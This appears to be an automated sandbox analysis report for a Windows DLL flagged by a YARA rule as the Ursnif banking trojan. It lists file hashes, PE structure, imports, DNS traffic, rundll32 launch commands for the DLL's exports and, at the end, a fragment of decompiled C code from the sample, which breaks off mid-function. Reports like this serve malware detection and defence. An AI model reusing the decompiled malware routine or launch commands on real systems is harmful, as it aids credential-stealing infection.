C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{20078DE2-B35D-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	14936
Entropy (8bit):	1.5448255572685763
Encrypted:	false
SSDEEP:	48:Iw0GcprdGwpaVG4pQJGrapbSaGQpB6GHHpm:roZHQH6pBSijBg
MD5:	75B9311DC327D4B60EDACD38906AAD77
SHA1:	F6936702FDCB04C1D892B8E57DD19990B802786D
SHA-256:	E7BDD1D59779EFA94418DC0D478B7D11D753157B8C20AFBCCD006CF377B3C346
SHA-512:	AF51F9501B1D91B0E1B445D6F098C0F3519272D229EB6F8016B63B6C465930900BE9ABD7D9674E40FDD777ACF45E745AEE3B505B4CD210F2E1FCED6B84324873
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF431E96C18C7F8EF8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	21349
Entropy (8bit):	0.2951707289341719
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw0:kBqoxKAuvScS+0
MD5:	F9BEBD0A297294BDC7B8C6114EB819EE
SHA1:	B1B441E13DB70A0D1E0CC3A2A6190C5C1A91F3D8
SHA-256:	6A30EE99C23AA29DC94019C3BAA95B463123752680D4FE185BF5FA05BEF15F17
SHA-512:	01B70F54D5091580CA105C7F04407B48EE2FFDCD7C77BAA39F871407577F9F4F193BAB3AFB9924BE7DC50568534A226D63EA77FFE8B8F13889DAFE632DA3B498
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE4F68CE1A440F339.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12917
Entropy (8bit):	0.39624837245012057
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo0F9loU9lWXFhOB:kBqoIv51kB
MD5:	4762FCF754568D904969642F670EB3B1
SHA1:	75FC43D947F228DAA1EC1BA2E54562C8FC869D41
SHA-256:	8E4034726C607D15EF4ADEEC4D952A17EAE0ADC1F52AEC4A96752316D7A53060
SHA-512:	DBDF57587E7E3EC021A14FC21303A2E7EB7DDF7D66B38D69478566079C5546454C808A3A48786A7524A65ACAD54E076FE832935C5390DBF61B4AFFB0E96DA262
Malicious:	false
Reputation:	low
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.324532607203666
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kZcCqvNtWa.dll
File size:	478720
MD5:	b9b732dbc6f94c79b5767eb98ebd899a
SHA1:	984a3ba5d4fe06265ce23cec82bda6a63b2bb3bc
SHA256:	1a0d4b328438a72cee012f6387825d942463b896fadc13f2c17e8d005f510cd4
SHA512:	595b4429e9f13212740ac4f9e12282dc3fdf9e141041695e4fe6302acf7aac2527275cb6a98eec78049758972c946cc62971604f68f7de68ad2350d13bac497a
SSDEEP:	12288:4Z31u8+a95+CA9lROexw8P7CbxXTTbWA:4Z31P9wr9lROow8W/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C...".J.".J.".J...J.".J.pwJ.".J4mrJ.".J.pqJ.".J.pgJ.".J.p`J.".J...J.".J.".J.#.J.pkJ.".J.pvJ.".J.ppJ.".J.puJ.".JRich.".J.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1041953
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x608B79B0 [Fri Apr 30 03:29:52 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a2f0d616525ae6c643810961c7d4fdfe

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FEB209FAF67h
call 00007FEB209FF8CCh
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FEB209FAE51h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [01073618h+ecx*8]
je 00007FEB209FAF75h
inc ecx
cmp ecx, 2Dh
jc 00007FEB209FAF53h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FEB209FAF70h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0107361Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FEB209FC836h
test eax, eax
jne 00007FEB209FAF68h
mov eax, 01073780h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0108B5ACh], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [0108B5ACh]
call 00007FEB209FC636h
pop ecx
test eax, eax
je 00007FEB209FAF71h
push dword ptr [ebp+08h]
call eax
pop ecx
test eax, eax
je 00007FEB209FAF67h
xor eax, eax
inc eax
pop ebp
ret
xor eax, eax
pop ebp
ret
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 0108B5B8h
cmp dword ptr [0107378Ch+esi*8], 01h
jne 00007FEB209FAF80h
lea eax, dword ptr [00000088h+esi*8]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2008 build 21022
[EXP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x72630	0x6f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x71e64	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8d000	0x3bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0x1544	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49190	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x70c08	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x49000	0x15c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4732e	0x47400	False	0.745877878289	data	6.57407814817	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x49000	0x2969f	0x29800	False	0.65666768637	data	5.42368765721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x73000	0x1917c	0x1400	False	0.2435546875	data	3.63177828336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8d000	0x3bc	0x400	False	0.4091796875	data	3.09285651514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0x2588	0x2600	False	0.456106085526	data	4.61056666922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x8d058	0x364	data	English	United States

Imports

DLL	Import
KERNEL32.dll	QueryPerformanceCounter, GetVolumeInformationW, GetSystemTime, GetModuleHandleW, GetVersionExW, OpenProcess, GetDateFormatW, FindResourceW, LockResource, GetLocalTime, HeapCreate, CreateFileW, HeapFree, HeapCompact, HeapAlloc, VirtualProtectEx, GetCurrentDirectoryW, SetConsoleCP, SetConsoleOutputCP, GetStringTypeW, GetStringTypeA, GetLocaleInfoA, LoadLibraryA, GetLastError, HeapReAlloc, RtlUnwind, GetCurrentThreadId, GetCommandLineA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapDestroy, VirtualFree, VirtualAlloc, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, RaiseException, HeapSize, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount
ole32.dll	CoCreateInstance, CoUninitialize, OleInitialize, OleUninitialize, CoInitialize
WINSPOOL.DRV	EnumPrintersW, GetPrinterDataW, GetPrinterW, DocumentPropertiesW, OpenPrinterW, ClosePrinter

Exports

Name	Ordinal	Address
Eithernothing	1	0x103a020
Order	2	0x1039f40
Smileschool	3	0x1039b20

Version Infos

Description	Data
LegalCopyright	Notice sister Corporation. All rights reserved
InternalName	Slow
FileVersion	3.2.1.380
CompanyName	Notice sister Corporation
ProductName	Notice sister Soil read
Observe	38
ProductVersion	3.2.1
FileDescription	Notice sister Soil read Skinneed
OriginalFilename	Tail.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 13:01:22.364706993 CEST	60985	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:22.421803951 CEST	53	60985	8.8.8.8	192.168.2.3
May 12, 2021 13:01:22.644109011 CEST	50200	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:22.692748070 CEST	51281	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:22.711570978 CEST	53	50200	8.8.8.8	192.168.2.3
May 12, 2021 13:01:22.749787092 CEST	53	51281	8.8.8.8	192.168.2.3
May 12, 2021 13:01:23.860627890 CEST	49199	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:23.910384893 CEST	53	49199	8.8.8.8	192.168.2.3
May 12, 2021 13:01:24.778978109 CEST	50620	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:24.830625057 CEST	53	50620	8.8.8.8	192.168.2.3
May 12, 2021 13:01:25.658778906 CEST	64938	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:25.707258940 CEST	53	64938	8.8.8.8	192.168.2.3
May 12, 2021 13:01:26.528624058 CEST	60152	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:26.587990999 CEST	53	60152	8.8.8.8	192.168.2.3
May 12, 2021 13:01:26.948482990 CEST	57544	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:27.000016928 CEST	53	57544	8.8.8.8	192.168.2.3
May 12, 2021 13:01:27.806850910 CEST	55984	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:27.867090940 CEST	53	55984	8.8.8.8	192.168.2.3
May 12, 2021 13:01:30.044956923 CEST	64185	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:30.093739986 CEST	53	64185	8.8.8.8	192.168.2.3
May 12, 2021 13:01:32.348197937 CEST	65110	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:32.397023916 CEST	53	65110	8.8.8.8	192.168.2.3
May 12, 2021 13:01:33.171554089 CEST	58361	53	192.168.2.3	8.8.8.8
May 12, 2021 13:01:33.223162889 CEST	53	58361	8.8.8.8	192.168.2.3
May 12, 2021 13:02:08.864763975 CEST	63492	53	192.168.2.3	8.8.8.8
May 12, 2021 13:02:08.944426060 CEST	53	63492	8.8.8.8	192.168.2.3
May 12, 2021 13:02:19.656306028 CEST	60831	53	192.168.2.3	8.8.8.8
May 12, 2021 13:02:19.733886957 CEST	53	60831	8.8.8.8	192.168.2.3
May 12, 2021 13:02:57.918824911 CEST	60100	53	192.168.2.3	8.8.8.8
May 12, 2021 13:02:57.967470884 CEST	53	60100	8.8.8.8	192.168.2.3
May 12, 2021 13:02:58.847552061 CEST	53195	53	192.168.2.3	8.8.8.8
May 12, 2021 13:02:58.899087906 CEST	53	53195	8.8.8.8	192.168.2.3
May 12, 2021 13:02:59.686183929 CEST	50141	53	192.168.2.3	8.8.8.8
May 12, 2021 13:02:59.734926939 CEST	53	50141	8.8.8.8	192.168.2.3
May 12, 2021 13:03:00.798839092 CEST	53023	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:00.847754002 CEST	53	53023	8.8.8.8	192.168.2.3
May 12, 2021 13:03:01.626238108 CEST	49563	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:01.675170898 CEST	53	49563	8.8.8.8	192.168.2.3
May 12, 2021 13:03:02.806885958 CEST	51352	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:02.855701923 CEST	53	51352	8.8.8.8	192.168.2.3
May 12, 2021 13:03:03.114238024 CEST	59349	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:03.204421997 CEST	53	59349	8.8.8.8	192.168.2.3
May 12, 2021 13:03:03.577776909 CEST	57084	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:03.626724958 CEST	53	57084	8.8.8.8	192.168.2.3
May 12, 2021 13:03:04.362020016 CEST	58823	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:04.413634062 CEST	53	58823	8.8.8.8	192.168.2.3
May 12, 2021 13:03:10.289743900 CEST	57568	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:10.339876890 CEST	53	57568	8.8.8.8	192.168.2.3
May 12, 2021 13:03:11.182039022 CEST	50540	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:11.239130020 CEST	53	50540	8.8.8.8	192.168.2.3
May 12, 2021 13:03:23.390181065 CEST	54366	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:23.450407982 CEST	53	54366	8.8.8.8	192.168.2.3
May 12, 2021 13:03:32.916106939 CEST	53034	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:32.975302935 CEST	53	53034	8.8.8.8	192.168.2.3
May 12, 2021 13:03:34.283544064 CEST	57762	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:34.332479954 CEST	53	57762	8.8.8.8	192.168.2.3
May 12, 2021 13:03:35.099181890 CEST	55435	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:35.156474113 CEST	53	55435	8.8.8.8	192.168.2.3
May 12, 2021 13:03:35.310314894 CEST	50713	53	192.168.2.3	8.8.8.8
May 12, 2021 13:03:35.359015942 CEST	53	50713	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 13:03:34.283544064 CEST	192.168.2.3	8.8.8.8	0x5e15	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.099181890 CEST	192.168.2.3	8.8.8.8	0x73b8	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.310314894 CEST	192.168.2.3	8.8.8.8	0x79a2	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
May 12, 2021 13:03:34.332479954 CEST	8.8.8.8	192.168.2.3	0x5e15	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	HHN-efz.ms-acdc.office.com		52.98.171.226	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.82	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.242	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.156474113 CEST	8.8.8.8	192.168.2.3	0x73b8	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.194	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.50	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	HHN-efz.ms-acdc.office.com		40.101.136.18	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	HHN-efz.ms-acdc.office.com		52.98.171.226	A (IP address)	IN (0x0001)
May 12, 2021 13:03:35.359015942 CEST	8.8.8.8	192.168.2.3	0x79a2	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.162	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1956 Parent PID: 5472

General

Start time:	13:01:30
Start date:	12/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll'
Imagebase:	0x1210000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1720 Parent PID: 1956

General

Start time:	13:01:32
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5820 Parent PID: 1956

General

Start time:	13:01:32
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing
Imagebase:	0x1310000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5788 Parent PID: 1720

General

Start time:	13:01:32
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
Imagebase:	0x1310000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2168 Parent PID: 1956

General

Start time:	13:01:36
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order
Imagebase:	0x1310000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6160 Parent PID: 1956

General

Start time:	13:01:40
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool
Imagebase:	0x1310000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1492 Parent PID: 792

General

Start time:	13:03:32
Start date:	12/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff62b4d0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5168 Parent PID: 1492

General

Start time:	13:03:33
Start date:	12/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2
Imagebase:	0x1360000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1956 Parent PID: 5472 loaddll32.exeCOMMON

Executed Functions

Function 001D4C3B, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E001D4C3B(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x1dd2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x1dd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x1dd2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x1dd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x1dd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x1dd2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x1dd2a4; // 0x2dca5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x1de7f2; // 0x73797325
				_t83 = E001D903C(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x1dd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x1dd2a4; // 0x2dca5a8
				_t16 = _t93 + 0x1de813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
